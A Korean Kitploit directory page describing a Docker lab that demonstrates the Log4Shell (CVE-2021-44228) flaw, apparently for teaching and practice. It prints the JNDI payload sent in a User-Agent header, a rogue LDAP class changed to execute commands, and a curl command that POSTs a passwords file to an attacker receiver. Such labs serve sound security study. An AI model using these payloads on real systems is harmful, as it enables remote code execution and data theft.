Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-44228-docker-example — CVE-2021-44228 (Log4Shell) 취약점 악용을 위한 Docker 기반 데모로, 취약한 Java 서버, 악의적인 LDAP 서버, 공격자가 제어하는 수신기로의 데이터 유출을 포함합니다. | Kitploit
도구/GitHubGitHub/dicanio/cve-2021-44228-docker-example
Vulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationLearning & EducationLabs & Practice
GitHubdicanio/cve-2021-44228-docker-example

CVE-2021-44228-docker-example

CVE-2021-44228 (Log4Shell) 취약점 악용을 위한 Docker 기반 데모로, 취약한 Java 서버, 악의적인 LDAP 서버, 공격자가 제어하는 수신기로의 데이터 유출을 포함합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
14년 전아직 검토되지 않음

CVE-2021-44228-docker-example

취약한 서버에서 공격자가 제어하는 웹 서비스로 데이터를 전송하는 CVE-2021-44228의 간단한 데모입니다. 모든 구성 요소는 Docker를 통해 실행됩니다.

구성 요소

vulnerable-server

이는 표준 Java 서버로, 피해자 역할을 합니다. 다음을 실행합니다:

  • Java 8u111
  • Web Application (Spring Boot 2.6.1)
  • Log4J

이 서버는 이 구성에서 취약합니다.

추가 정보:

  • /logging 엔드포인트 (GET)는 Log4J를 사용하여 사용자 에이전트를 로깅합니다.
  • /foo/passwords.txt 파일이 존재합니다 (공격자의 대상)

passwords.txt의 내용:

root@kitploit:~
my secret

malicious-receiver

이는 표준 Java 서버로, 공격자의 데이터 수집기 역할을 합니다. 다음을 실행합니다:

  • Java 17
  • Web Application (Spring Boot 2.6.1)

추가 정보:

  • receiver 엔드포인트 (POST)는 요청 본문을 로깅합니다.

malicious-ldap

이는 rogue-jndi로 구동되는 LDAP 서버입니다. ExportJava 클래스가 수정되어 -c 플래그를 통해 전달된 명령이 실행됩니다.

root@kitploit:~
public ExportObject() {
    try {
        Runtime.getRuntime().exec(Config.command);
    } catch(Exception e) {
        e.printStackTrace();
    }
}

취약한 서버가 요청하면, 인스턴스화될 때 다음 명령을 실행하는 클래스로 응답합니다:

root@kitploit:~
curl -XPOST http://172.18.18.11:8082/receiver --data-binary @/foo/passwords.txt

이렇게 하면 /foo/passwords.txt의 내용이 효과적으로 악의적인 수신기의 준비된 엔드포인트에 POST됩니다.

사용 방법

  1. Docker 이미지를 설정하려면 다음을 실행하세요:
    root@kitploit:~
    ./build.sh
    
  2. 컴포넌트 컨테이너를 시작하려면 다음을 실행하세요:
    root@kitploit:~
    ./start.sh
    
  3. 취약점을 트리거하려면 다음을 실행하세요:
    root@kitploit:~
    curl -A '${jndi:ldap://172.18.18.10/o=reference}' localhost:8081/logging
    
  4. 악의적인 수신기 컴포넌트의 로깅 출력을 확인하려면 다음을 실행하세요:
    root@kitploit:~
    docker logs --timestamps docker_malicious-receiver_1
    
    서버의 passwords.txt 파일 내용이 표시되어야 합니다.
  5. 컴포넌트 컨테이너를 중지하려면 다음을 실행하세요:
    root@kitploit:~
    ./stop.sh
    
도구 다운로드